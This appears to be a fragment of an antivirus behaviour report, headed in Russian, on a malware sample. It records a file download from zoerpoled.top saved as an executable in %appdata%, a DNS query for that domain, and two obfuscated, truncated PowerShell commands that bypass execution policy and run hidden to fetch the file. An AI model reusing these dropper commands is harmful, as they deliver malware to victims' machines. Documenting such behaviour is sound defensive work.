Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POweRSHELl.ex^e ^-e^XEc^utiONpOL^ic^Y ^b^ypass^ -^nO^p^rO^F^iLE ^-wINdOWs^T^Y^l^e^ h^I^ddEN^ ^(nEW-Ob^jE^ct syS^Tem.^NE^t^.wEB^CL^IeNT^).D^own^LoA^DF^iL^E^('http://www.zoerpoled....
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "POweRSHELl.ex^e ^-e^XEc^utiONpOL^ic^Y ^b^ypass^ -^nO^p^rO^F^iLE ^-wINdOWs^T^Y^l^e^ h^I^ddEN^ ^(nEW-Ob^jE^ct syS^Tem.^NE^t^.wEB^CL^IeNT^).D^own^LoA^DF^iL^E^('http://www.zoerpoled....' (со скрытым окном)